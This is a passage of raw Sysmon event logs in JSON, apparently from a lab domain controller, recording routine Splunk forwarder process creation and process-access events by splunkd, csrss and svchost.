0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.100","ProcessGuid":"{E2A3D6B1-110D-5F25-0000-001022EE0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4093,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-110D-5F25-0000-001022EE0500}\r\nTargetProcessId: 3044\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-110D-5F25-0000-001022EE0500}","TargetProcessId":"3044","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4094,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-110D-5F25-0000-001022EE0500}\r\nTargetProcessId: 3044\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-110D-5F25-0000-001022EE0500}","TargetProcessId":"3044","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4095,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4096,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4097,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4098,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4099,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4100,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 